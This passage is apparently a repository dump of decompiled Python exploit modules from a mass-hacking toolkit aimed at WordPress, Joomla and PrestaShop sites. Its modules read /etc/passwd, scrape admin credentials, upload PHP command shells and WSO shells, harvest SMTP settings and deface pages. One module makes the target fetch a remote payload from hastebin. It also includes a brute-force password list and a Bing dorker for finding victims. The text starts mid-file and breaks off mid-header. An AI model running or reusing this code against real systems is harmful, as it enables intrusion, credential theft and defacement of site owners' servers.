requests.get('http://' + site + '/wp-content/plugins/wp-miniaudioplayer/map_download.php?fileurl=/etc/passwd', timeout=5, headers=Headers) 22 | if 'nologin' in etc.content: 23 | with open('result/Passwd_file.content', 'a') as writer: 24 | writer.write('---------------------------\nSite: ' + site + '\n' + etc.content + '\n') 25 | return printModule.returnYes(site, 'N/A', 'wp-miniaudioplayer', 'Wordpress') 26 | else: 27 | return printModule.returnNo(site, 'N/A', 'wp-miniaudioplayer', 'Wordpress') 28 | 29 | else: 30 | return printModule.returnNo(site, 'N/A', 'wp-miniaudioplayer', 'Wordpress') 31 | except: 32 | return printModule.returnNo(site, 'N/A', 'wp-miniaudioplayer', 'Wordpress') -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Wp_HD_WebPlayer.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 2.11.5 2 | # Python bytecode 2.7 (62211) 3 | # Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41) 4 | # [GCC 9.3.0] 5 | # Embedded file name: Exploits\Wp_HD_WebPlayer.py 6 | import requests 7 | import re 8 | from Exploits import printModule 9 | MailPoetZipShell = 'files/rock.zip' 10 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0' 11 | } 12 | 13 | def Exploit(site): 14 | try: 15 | check = requests.get('http://' + site + '/wp-content/plugins/hd-webplayer/playlist.php', timeout=10, headers=Headers) 16 | if '(.*)', GoT.content) 20 | username = User_Pass[1].split(':')[0] 21 | password = User_Pass[1].split(':')[1] 22 | with open('result/Sqli_result.txt', 'a') as writer: 23 | writer.write('------------------------------\nDomain: ' + str(site) + '\nUsername: ' + str(username) + '\nPassword: ' + str(password) + '\n') 24 | return printModule.returnYes(site, 'N/A', 'hd-webplayer', 'Wordpress') 25 | return printModule.returnNo(site, 'N/A', 'hd-webplayer', 'Wordpress') 26 | except: 27 | return printModule.returnNo(site, 'N/A', 'hd-webplayer', 'Wordpress') -------------------------------------------------------------------------------- /Files/Tool7/password.txt: -------------------------------------------------------------------------------- 1 | Nlq4s1P09o 2 | 12345 3 | 123456 4 | admin 5 | z178e4yZVu 6 | g403NS3pme 7 | 45esZr1hT7 8 | g5S9F41fot 9 | 1ayKTe66z3 10 | st0WV3qw49 11 | 0t8Soa9q7X 12 | g5S9F41fot 13 | z178e4yZVu 14 | 87iIM9snh7 15 | H15jcr3s2Y 16 | 5e85QhpBs5 17 | d4n6aZe62U 18 | v6uHK36dv1 19 | 123456 20 | password 21 | 12345678 22 | qwerty 23 | 123456789 24 | 12345 25 | 1234 26 | 111111 27 | 1234567 28 | dragon 29 | 123123 30 | baseball 31 | abc123 32 | football 33 | monkey 34 | letmein 35 | 696969 36 | shadow 37 | master 38 | 666666 39 | qwertyuiop 40 | 123321 41 | mustang 42 | 1234567890 43 | michael 44 | 654321 45 | pussy 46 | superman 47 | 1qaz2wsx 48 | 7777777 49 | fuckyou 50 | 121212 51 | 000000 52 | qazwsx 53 | 123qwe 54 | killer 55 | trustno1 56 | jordan 57 | jennifer 58 | zxcvbnm 59 | asdfgh 60 | hunter 61 | buster 62 | soccer 63 | harley 64 | batman 65 | andrew 66 | tigger 67 | sunshine 68 | iloveyou 69 | fuckme 70 | 2000 71 | charlie 72 | robert 73 | thomas 74 | hockey 75 | ranger 76 | daniel 77 | starwars 78 | klaster 79 | 112233 80 | george 81 | asshole 82 | computer 83 | michelle 84 | jessica 85 | pepper 86 | 1111 87 | zxcvbn 88 | 555555 89 | 11111111 90 | 131313 91 | freedom 92 | 777777 93 | pass 94 | fuck 95 | maggie 96 | 159753 97 | aaaaaa 98 | ginger 99 | princess 100 | joshua 101 | cheese 102 | amanda 103 | summer 104 | love 105 | ashley 106 | 6969 107 | nicole 108 | chelsea 109 | biteme 110 | matthew 111 | access 112 | yankees 113 | 987654321 114 | dallas 115 | austin 116 | thunder 117 | taylor 118 | matrix 119 | minecraft 120 | -------------------------------------------------------------------------------- /Files/Tool2/dorker.py: -------------------------------------------------------------------------------- 1 | import urllib, httplib, re, urllib2 2 | userAGE = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A' 3 | opener = urllib2.build_opener() 4 | opener.addheaders = [('User-agent', userAGE)] 5 | sitelist = [] 6 | comp = [] 7 | def dorker(dork,pages): 8 | d = urllib.quote(dork) 9 | p = 1 10 | m = pages * 10 11 | while p <= m: 12 | try: 13 | search = "http://www.bing.com/search?q=" + d +"&first=" + str(p) 14 | req = opener.open(search) 15 | source = req.read() 16 | sites = re.findall('

    ] Search in progress ...' 47 | dorker(dr, numpages) 48 | -------------------------------------------------------------------------------- /Files/Tool1/Exploits/CVE_2019_9978SocialWarfare.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 2.11.5 2 | # Python bytecode 2.7 (62211) 3 | # Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41) 4 | # [GCC 9.3.0] 5 | # Embedded file name: Exploits\CVE_2019_9978SocialWarfare.py 6 | import requests 7 | from Exploits import printModule 8 | r = '\x1b[31m' 9 | g = '\x1b[32m' 10 | y = '\x1b[33m' 11 | b = '\x1b[34m' 12 | m = '\x1b[35m' 13 | c = '\x1b[36m' 14 | w = '\x1b[37m' 15 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'} 16 | 17 | def Exploit(site): 18 | try: 19 | Payload = 'https://hastebin.com/raw/etonipusij' 20 | exp = 'http://{}/wp-admin/admin-post.php?swp_debug=load_options&swp_url={}'.format(site, Payload) 21 | requests.get(exp, timeout=10, headers=Headers) 22 | CheckShell = requests.get('http://{}/wp-admin/vuln.php'.format(site), timeout=10, headers=Headers) 23 | CheckIndex = requests.get('http://{}/wp-admin/vuln.htm'.format(site), timeout=10, headers=Headers) 24 | if 'Vuln!!' in str(CheckIndex.content): 25 | with open('result/Index_results.txt', 'a') as writer: 26 | writer.write('{}/wp-admin/vuln.htm\n'.format(site)) 27 | if 'Vuln!!' in str(CheckShell.content): 28 | with open('result/Shell_results.txt', 'a') as writer: 29 | writer.write('{}/wp-admin/vuln.php?cmd=whoami;);\n'.format(site)) 30 | return printModule.returnYes(site, 'CVE-2019-9978', 'Social Warfare', 'Wordpress') 31 | return printModule.returnNo(site, 'CVE-2019-9978', 'Social Warfare', 'Wordpress') 32 | except: 33 | return printModule.returnNo(site, 'CVE-2019-9978', 'Social Warfare', 'Wordpress') -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Presta_megamenu.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 2.11.5 2 | # Python bytecode 2.7 (62211) 3 | # Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41) 4 | # [GCC 9.3.0] 5 | # Embedded file name: Exploits\Presta_megamenu.py 6 | import requests 7 | from Exploits import printModule 8 | r = '\x1b[31m' 9 | g = '\x1b[32m' 10 | y = '\x1b[33m' 11 | b = '\x1b[34m' 12 | m = '\x1b[35m' 13 | c = '\x1b[36m' 14 | w = '\x1b[37m' 15 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'} 16 | Jce_Deface_image = 'files/pwn.gif' 17 | ShellPresta = 'files/up.php' 18 | 19 | def Exploit(site): 20 | try: 21 | Exp = site + '/modules/megamenu/uploadify/uploadify.php?id=pwn' 22 | Checkvuln = requests.get('http://' + Exp, timeout=10, headers=Headers) 23 | FileDataIndex = {'Filedata': open(Jce_Deface_image, 'rb')} 24 | if Checkvuln.status_code == 200: 25 | requests.post('http://' + Exp, files=FileDataIndex, timeout=10, headers=Headers) 26 | IndexPath = site + '/' + Jce_Deface_image.split('/')[1] 27 | CheckIndex = requests.get('http://' + IndexPath, timeout=10, headers=Headers) 28 | if 'GIF89a' in CheckIndex.content: 29 | with open('result/Index_results.txt', 'a') as writer: 30 | writer.write(IndexPath + '\n') 31 | return printModule.returnYes(site, 'N/A', 'megamenu Module', 'Prestashop') 32 | else: 33 | return printModule.returnNo(site, 'N/A', 'megamenu Module', 'Prestashop') 34 | 35 | else: 36 | return printModule.returnNo(site, 'N/A', 'megamenu Module', 'Prestashop') 37 | except: 38 | return printModule.returnNo(site, 'N/A', 'megamenu Module', 'Prestashop') -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Com_b2jcontact.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 2.11.5 2 | # Python bytecode 2.7 (62211) 3 | # Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41) 4 | # [GCC 9.3.0] 5 | # Embedded file name: Exploits\Com_b2jcontact.py 6 | import requests 7 | from Exploits import printModule 8 | from Tools import getSMTP 9 | from Tools import wsoShellUploaderModule 10 | payloadshell = '"Vuln!!"'.format('system({}'.format('$_GET["cmd"]')) 11 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0' 12 | } 13 | 14 | def Exploit(site): 15 | try: 16 | requests.post('http://' + site + '/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../vuln.php', data=payloadshell, timeout=10, headers=Headers) 17 | CheckSh = requests.get('http://' + site + '/components/com_b2jcontact/vuln.php', timeout=10, headers=Headers) 18 | if 'Vuln!!' in str(CheckSh.content): 19 | with open('result/Shell_results.txt', 'a') as writer: 20 | writer.write(site + '/components/com_b2jcontact/vuln.php?cmd=uname -a' + '\n') 21 | getSMTP.JooomlaSMTPshell(site + '/components/com_b2jcontact/vuln.php?cmd=id') 22 | WSo = wsoShellUploaderModule.UploadWso(site + '/components/com_b2jcontact/vuln.php?cmd=id') 23 | if WSo == 'No': 24 | pass 25 | else: 26 | with open('result/WSo_Shell.txt', 'a') as Wr: 27 | Wr.write('{}\n'.format(WSo)) 28 | return printModule.returnYes(site, 'N/A', 'Com_b2jcontact', 'Joomla') 29 | return printModule.returnNo(site, 'N/A', 'Com_b2jcontact', 'Joomla') 30 | except: 31 | return printModule.returnNo(site, 'N/A', 'Com_b2jcontact', 'Joomla') -------------------------------------------------------------------------------- /Files/Tool1/cms/unknown.txt: -------------------------------------------------------------------------------- 1 | q-systems.5co.org/index.php?topic=765.0 2 | q-systems.5co.org/index.php?topic=765.0 3 | www.google.bg/?gws_rd=ssl 4 | www.google.bg/?gws_rd=ssl 5 | www.security-database.com/cpe.php?detail=cpe:/a:wordpress:wordpress:0.7 6 | marketplace.visualstudio.com/items?itemName=jpagano.wordpress-vscode-extensionpack 7 | www.youtube.com/watch?v=1o2XcHqQbRY 8 | www.youtube.com/watch?v=1o2XcHqQbRY 9 | marketplace.visualstudio.com/items?itemName=jpagano.wordpress-vscode-extensionpack 10 | www.simplyhired.com/search?q=wordpress 11 | www.simplyhired.com/search?q=wordpress 12 | temaswordpressbr.com/downloads/plugin-toolset-access/?lang=en 13 | forums.iis.net/t/1242981.aspx?WordPress+on+IIS+not+recognizing+latest+version+of+PHP+installed+on+IIS+7+2+ 14 | www.xn--h1adoai.xn--p1ai/otzyv-ob-organizatsii.html?view=test&prodid=1 15 | themesinfo.com/?search_type=anywhere&search=free+themes&s=1 16 | themesinfo.com/?search_type=anywhere&search=free+themes&s=1 17 | www.webdeveloper.com/d/387200-wordpress-vs-coding?near=1 18 | dev.oldapps.com/Wordpress.php?old_wordpress=15 19 | themeforest.net/category/wordpress?term=bootstrap%204 20 | www.cvedetails.com/vulnerability-list.php?vendor_id=2337&product_id=4096&version_id=231499&page=1&hasexp=0&opdos=0&opec=0&opov=0&opcsrf=0&opgpriv=0&opsqli=0&opxss=0&opdirt=0&opmemc=0&ophttprs=0&opbyp=0&opfileinc=0&opginf=0&cvssscoremin=0&cvssscoremax=0&year=0&cweid=0&order=1&trc=18&sha=5a59dbeb1e80efbd614a65cbebda2a2d9ee2c92f 21 | www.lws.fr/hebergement_wordpress.php?rsource=adwords&rcampagne=hebergement_mutu_fr_search&rkeyword=wordpress&cpurl=PERS50 22 | www.freelancer.se/projects/wordpress/wordpress-woocommerce-membres/?ngsw-bypass=&w=f 23 | forestry.host4kb.com/admin/index.php?/rss/publisher/2/cb2243268f8a444f0e641c74c7fa35a0/faq/2708/aHR0cDovL2ZvcmVzdHJ5Lmhvc3Q0a2IuY29tLw~~/1 24 | -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Com_oziogallery.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 2.11.5 2 | # Python bytecode 2.7 (62211) 3 | # Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41) 4 | # [GCC 9.3.0] 5 | # Embedded file name: Exploits\Com_oziogallery.py 6 | import requests 7 | from Exploits import printModule 8 | from Tools import getSMTP 9 | from Tools import wsoShellUploaderModule 10 | payloadshell = '"Vuln!!"'.format('system({}'.format('$_GET["cmd"]')) 11 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0' 12 | } 13 | 14 | def Exploit(site): 15 | try: 16 | PostData = {'path': '../../../tmp/'} 17 | fil = {'raw_data': ('vuln.php', payloadshell, 'text/html')} 18 | requests.post('http://' + site + '/components/com_oziogallery/imagin/scripts_ralcr/filesystem/writeToFile.php', files=fil, data=PostData, headers=Headers, timeout=10) 19 | CheckShell = requests.get('http://' + site + '/tmp/up.php', headers=Headers, timeout=10) 20 | if 'Vuln!!' in str(CheckShell.content): 21 | with open('result/Shell_results.txt', 'a') as writer: 22 | writer.write(site + '/tmp/vuln.php?cmd=uname -a' + '\n') 23 | getSMTP.JooomlaSMTPshell(site + '/tmp/vuln.php?cmd=id') 24 | WSo = wsoShellUploaderModule.UploadWso(site + '/tmp/vuln.php?cmd=id') 25 | if WSo == 'No': 26 | pass 27 | else: 28 | with open('result/WSo_Shell.txt', 'a') as Wr: 29 | Wr.write('{}\n'.format(WSo)) 30 | return printModule.returnYes(site, 'N/A', 'Com_oziogallery', 'Joomla') 31 | return printModule.returnNo(site, 'N/A', 'Com_oziogallery', 'Joomla') 32 | except: 33 | return printModule.returnNo(site, 'N/A', 'Com_oziogallery', 'Joomla') -------------------------------------------------------------------------------- /Files/Tool1/Exploits/CVE_2015_5151_revsliderCSS.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 2.11.5 2 | # Python bytecode 2.7 (62211) 3 | # Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41) 4 | # [GCC 9.3.0] 5 | # Embedded file name: Exploits\CVE_2015_5151_revsliderCSS.py 6 | import requests 7 | from Exploits import printModule 8 | r = '\x1b[31m' 9 | g = '\x1b[32m' 10 | y = '\x1b[33m' 11 | b = '\x1b[34m' 12 | m = '\x1b[35m' 13 | c = '\x1b[36m' 14 | w = '\x1b[37m' 15 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'} 16 | 17 | def Exploit(site): 18 | IndeXText = 'Vuln!! Patch it Now!' 19 | ency = {'action': 'revslider_ajax_action','client_action': 'update_captions_css', 20 | 'data': "

    " + IndeXText + "

    " 21 | } 22 | try: 23 | url = 'http://' + site + '/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css' 24 | aa = requests.post(url, data=ency, timeout=10, headers=Headers) 25 | if 'succesfully' in str(aa.content): 26 | deface = site + '/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css' 27 | X = requests.get('http://' + deface, timeout=10, headers=Headers) 28 | if 'Vuln!!' in str(X.content): 29 | with open('result/Index_results.txt', 'a') as writer: 30 | writer.write(deface + '\n') 31 | return printModule.returnYes(site, 'CVE-2015-5151', 'Revslider CSS Injection', 'Wordpress') 32 | return printModule.returnNo(site, 'CVE-2015-5151', 'Revslider CSS Injection', 'Wordpress') 33 | except: 34 | return printModule.returnNo(site, 'CVE-2015-5151', 'Revslider CSS Injection', 'Wordpress') -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Presta_videostab.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 2.11.5 2 | # Python bytecode 2.7 (62211) 3 | # Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41) 4 | # [GCC 9.3.0] 5 | # Embedded file name: Exploits\Presta_videostab.py 6 | import requests 7 | from Exploits import printModule 8 | r = '\x1b[31m' 9 | g = '\x1b[32m' 10 | y = '\x1b[33m' 11 | b = '\x1b[34m' 12 | m = '\x1b[35m' 13 | c = '\x1b[36m' 14 | w = '\x1b[37m' 15 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'} 16 | Jce_Deface_image = 'files/pwn.gif' 17 | ShellPresta = 'files/up.php' 18 | 19 | def Exploit(site): 20 | try: 21 | Exp = site + '/modules/videostab/ajax_videostab.php?action=submitUploadVideo%26id_product=upload' 22 | Checkvuln = requests.get('http://' + Exp, timeout=5, headers=Headers) 23 | FileDataIndex = {'qqfile': open(Jce_Deface_image, 'rb')} 24 | if Checkvuln.status_code == 200: 25 | requests.post('http://' + Exp, files=FileDataIndex, timeout=5, headers=Headers) 26 | IndexPath = site + '/modules/videostab/uploads/' + Jce_Deface_image.split('/')[1] 27 | CheckIndex = requests.get('http://' + IndexPath, timeout=5, headers=Headers) 28 | if 'GIF89a' in CheckIndex.content: 29 | with open('result/Index_results.txt', 'a') as writer: 30 | writer.write(IndexPath + '\n') 31 | return printModule.returnYes(site, 'N/A', 'videostab Module', 'Prestashop') 32 | else: 33 | return printModule.returnNo(site, 'N/A', 'videostab Module', 'Prestashop') 34 | 35 | else: 36 | return printModule.returnNo(site, 'N/A', 'videostab Module', 'Prestashop') 37 | except: 38 | return printModule.returnNo(site, 'N/A', 'videostab Module', 'Prestashop') -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Presta_cartabandonmentpro.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 2.11.5 2 | # Python bytecode 2.7 (62211) 3 | # Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41) 4 | # [GCC 9.3.0] 5 | # Embedded file name: Exploits\Presta_cartabandonmentpro.py 6 | import requests 7 | from Exploits import printModule 8 | r = '\x1b[31m' 9 | g = '\x1b[32m' 10 | y = '\x1b[33m' 11 | b = '\x1b[34m' 12 | m = '\x1b[35m' 13 | c = '\x1b[36m' 14 | w = '\x1b[37m' 15 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'} 16 | Jce_Deface_image = 'files/pwn.gif' 17 | ShellPresta = 'files/up.php' 18 | 19 | def Exploit(site): 20 | try: 21 | Exp = site + '/modules/cartabandonmentpro/upload.php' 22 | Checkvuln = requests.get('http://' + Exp, timeout=5, headers=Headers) 23 | FileDataIndex = {'image': open(Jce_Deface_image, 'rb')} 24 | if Checkvuln.status_code == 200: 25 | requests.post('http://' + Exp, files=FileDataIndex, timeout=5, headers=Headers) 26 | IndexPath = site + '/modules/cartabandonmentpro/uploads/' + Jce_Deface_image.split('/')[1] 27 | CheckIndex = requests.get('http://' + IndexPath, timeout=5, headers=Headers) 28 | if 'GIF89a' in CheckIndex.content: 29 | with open('result/Index_results.txt', 'a') as writer: 30 | writer.write(IndexPath + '\n') 31 | return printModule.returnYes(site, 'N/A', 'cartabandonmentpro Module', 'Prestashop') 32 | else: 33 | return printModule.returnNo(site, 'N/A', 'cartabandonmentpro Module', 'Prestashop') 34 | 35 | else: 36 | return printModule.returnNo(site, 'N/A', 'cartabandonmentpro Module', 'Prestashop') 37 | except: 38 | return printModule.returnNo(site, 'N/A', 'cartabandonmentpro Module', 'Prestashop') -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Com_Fabric.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 2.11.5 2 | # Python bytecode 2.7 (62211) 3 | # Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41) 4 | # [GCC 9.3.0] 5 | # Embedded file name: Exploits\Com_Fabric.py 6 | import requests 7 | from Exploits import printModule 8 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'} 9 | r = '\x1b[31m' 10 | g = '\x1b[32m' 11 | y = '\x1b[33m' 12 | b = '\x1b[34m' 13 | m = '\x1b[35m' 14 | c = '\x1b[36m' 15 | w = '\x1b[37m' 16 | TextindeX = 'files/vuln.txt' 17 | 18 | def Exploit(site): 19 | try: 20 | fileindex = {'userfile': (TextindeX, open(TextindeX, 'rb'), 'multipart/form-data')} 21 | post_data = {'name': 'me.php', 22 | 'drop_data': '1', 23 | 'overwrite': '1', 24 | 'field_delimiter': ',', 25 | 'text_delimiter': '"', 26 | 'option': 'com_fabrik', 27 | 'controller': 'import', 28 | 'view': 'import', 29 | 'task': 'doimport', 30 | 'Itemid': '0', 31 | 'tableid': '0' 32 | } 33 | Exp = 'http://' + site + '/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=' 34 | requests.post(Exp, files=fileindex, data=post_data, timeout=10, headers=Headers) 35 | Check = requests.get('http://' + site + '/media/' + TextindeX.split('/')[1], headers=Headers, timeout=10) 36 | if 'Vuln!!' in str(Check.content): 37 | with open('result/Index_results.txt', 'a') as writer: 38 | writer.write(site + '/media/' + TextindeX.split('/')[1] + '\n') 39 | return printModule.returnYes(site, 'N/A', 'Com_Fabric', 'Joomla') 40 | return printModule.returnNo(site, 'N/A', 'Com_Fabric', 'Joomla') 41 | except: 42 | return printModule.returnNo(site, 'N/A', 'Com_Fabric', 'Joomla') -------------------------------------------------------------------------------- /Files/Tool1/Exploits/cartabandonmentproOld.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 2.11.5 2 | # Python bytecode 2.7 (62211) 3 | # Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41) 4 | # [GCC 9.3.0] 5 | # Embedded file name: Exploits\cartabandonmentproOld.py 6 | import requests 7 | import re 8 | from Exploits import printModule 9 | r = '\x1b[31m' 10 | g = '\x1b[32m' 11 | y = '\x1b[33m' 12 | b = '\x1b[34m' 13 | m = '\x1b[35m' 14 | c = '\x1b[36m' 15 | w = '\x1b[37m' 16 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'} 17 | Jce_Deface_image = 'files/pwn.gif' 18 | ShellPresta = 'files/up.php' 19 | 20 | def Exploit(site): 21 | try: 22 | Exp = site + '/modules/cartabandonmentproOld/upload.php' 23 | Checkvuln = requests.get('http://' + Exp, timeout=5, headers=Headers) 24 | FileDataIndex = {'image': open(Jce_Deface_image, 'rb')} 25 | if Checkvuln.status_code == 200: 26 | requests.post('http://' + Exp, files=FileDataIndex, timeout=5, headers=Headers) 27 | IndexPath = site + '/modules/cartabandonmentproOld/uploads/' + Jce_Deface_image.split('/')[1] 28 | CheckIndex = requests.get('http://' + IndexPath, timeout=5, headers=Headers) 29 | if 'GIF89a' in str(CheckIndex.content): 30 | with open('result/Index_results.txt', 'a') as writer: 31 | writer.write(IndexPath + '\n') 32 | return printModule.returnYes(site, 'N/A', 'CartabandonmentproOld Module', 'Prestashop') 33 | else: 34 | return printModule.returnNo(site, 'N/A', 'CartabandonmentproOld Module', 'Prestashop') 35 | 36 | else: 37 | return printModule.returnNo(site, 'N/A', 'CartabandonmentproOld Module', 'Prestashop') 38 | except: 39 | return printModule.returnNo(site, 'N/A', 'CartabandonmentproOld Module', 'Prestashop') -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Com_simplephotogallery.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 2.11.5 2 | # Python bytecode 2.7 (62211) 3 | # Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41) 4 | # [GCC 9.3.0] 5 | # Embedded file name: Exploits\Com_simplephotogallery.py 6 | import requests 7 | from Exploits import printModule 8 | from Tools import getSMTP 9 | from Tools import wsoShellUploaderModule 10 | payloadshell = '"Vuln!!"'.format('system({}'.format('$_GET["cmd"]')) 11 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0' 12 | } 13 | 14 | def Exploit(site): 15 | try: 16 | PostData = {'jpath': '..%2F..%2F..%2F..%2Ftmp%2F' 17 | } 18 | fil = {'file': ('vuln.php.xxxjpg', payloadshell, 'text/html')} 19 | requests.post('http://' + site + '/administrator/components/com_simplephotogallery/lib/uploadFile.php', data=PostData, files=fil, timeout=10, headers=Headers) 20 | Exp = requests.get('http://' + site + '/tmp/vuln.php.xxxjpg', timeout=10, headers=Headers) 21 | if 'Vuln!!' in str(Exp.content): 22 | with open('result/Shell_results.txt', 'a') as writer: 23 | writer.write(site + '/tmp/vuln.php.xxxjpg?cmd=uname -a' + '\n') 24 | getSMTP.JooomlaSMTPshell(site + '/tmp/vuln.php.xxxjpg?cmd=id') 25 | WSo = wsoShellUploaderModule.UploadWso(site + '/tmp/vuln.php.xxxjpg?cmd=id') 26 | if WSo == 'No': 27 | pass 28 | else: 29 | with open('result/WSo_Shell.txt', 'a') as Wr: 30 | Wr.write('{}\n'.format(WSo)) 31 | return printModule.returnYes(site, 'N/A', 'Com_simplephotogallery', 'Joomla') 32 | return printModule.returnNo(site, 'N/A', 'Com_simplephotogallery', 'Joomla') 33 | except: 34 | return printModule.returnNo(site, 'N/A', 'Com_simplephotogallery', 'Joomla') -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Presta_advancedslider.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 2.11.5 2 | # Python bytecode 2.7 (62211) 3 | # Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41) 4 | # [GCC 9.3.0] 5 | # Embedded file name: Exploits\Presta_advancedslider.py 6 | import requests 7 | from Exploits import printModule 8 | r = '\x1b[31m' 9 | g = '\x1b[32m' 10 | y = '\x1b[33m' 11 | b = '\x1b[34m' 12 | m = '\x1b[35m' 13 | c = '\x1b[36m' 14 | w = '\x1b[37m' 15 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'} 16 | Jce_Deface_image = 'files/pwn.gif' 17 | ShellPresta = 'files/up.php' 18 | 19 | def Exploit(site): 20 | try: 21 | Exp = site + '/modules/advancedslider/ajax_advancedsliderUpload.php?action=submitUploadImage%26id_slide=php' 22 | Checkvuln = requests.get('http://' + Exp, timeout=10, headers=Headers) 23 | FileDataIndex = {'qqfile': open(Jce_Deface_image, 'rb')} 24 | if Checkvuln.status_code == 200: 25 | requests.post('http://' + Exp, files=FileDataIndex, timeout=10, headers=Headers) 26 | IndexPath = site + '/modules/advancedslider/uploads/' + Jce_Deface_image.split('/')[1] 27 | CheckIndex = requests.get('http://' + IndexPath, timeout=10, headers=Headers) 28 | if 'GIF89a' in str(CheckIndex.content): 29 | with open('result/Index_results.txt', 'a') as writer: 30 | writer.write(IndexPath + '\n') 31 | return printModule.returnYes(site, 'N/A', 'advancedslider Module', 'Prestashop') 32 | else: 33 | return printModule.returnNo(site, 'N/A', 'advancedslider Module', 'Prestashop') 34 | 35 | else: 36 | return printModule.returnNo(site, 'N/A', 'advancedslider Module', 'Prestashop') 37 | except: 38 | return printModule.returnNo(site, 'N/A', 'advancedslider Module', 'Prestashop') -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Com_redmystic.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 2.11.5 2 | # Python bytecode 2.7 (62211) 3 | # Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41) 4 | # [GCC 9.3.0] 5 | # Embedded file name: Exploits\Com_redmystic.py 6 | import requests 7 | from Exploits import printModule 8 | from Tools import getSMTP 9 | from Tools import wsoShellUploaderModule 10 | payloadshell = '"Vuln!!"'.format('system({}'.format('$_GET["cmd"]')) 11 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0' 12 | } 13 | 14 | def Exploit(site): 15 | try: 16 | requests.post('http://' + site + '/administrator/components/com_redmystic/chart/ofc-library/ofc_upload_image.php?name=vuln.php', data=payloadshell, headers=Headers, timeout=10) 17 | Exp = requests.get('http://' + site + '/administrator/components/com_redmystic/chart/tmp-upload-images/vuln.php', headers=Headers, timeout=10) 18 | if 'Vuln!!' in str(Exp.content): 19 | with open('result/Shell_results.txt', 'a') as writer: 20 | writer.write(site + '/administrator/components/com_redmystic/chart/tmp-upload-images/vuln.php?cmd=uname -a' + '\n') 21 | getSMTP.JooomlaSMTPshell(site + '/administrator/components/com_redmystic/chart/tmp-upload-images/vuln.php?cmd=id') 22 | WSo = wsoShellUploaderModule.UploadWso(site + '/administrator/components/com_redmystic/chart/tmp-upload-images/vuln.php?cmd=id') 23 | if WSo == 'No': 24 | pass 25 | else: 26 | with open('result/WSo_Shell.txt', 'a') as Wr: 27 | Wr.write('{}\n'.format(WSo)) 28 | return printModule.returnYes(site, 'N/A', 'Com_redmystic', 'Joomla') 29 | return printModule.returnNo(site, 'N/A', 'Com_redmystic', 'Joomla') 30 | except: 31 | return printModule.returnNo(site, 'N/A', 'Com_redmystic', 'Joomla') -------------------------------------------------------------------------------- /Files/Tool1/Exploits/CVE_2019_9879wp_graphql.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 2.11.5 2 | # Python bytecode 2.7 (62211) 3 | # Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41) 4 | # [GCC 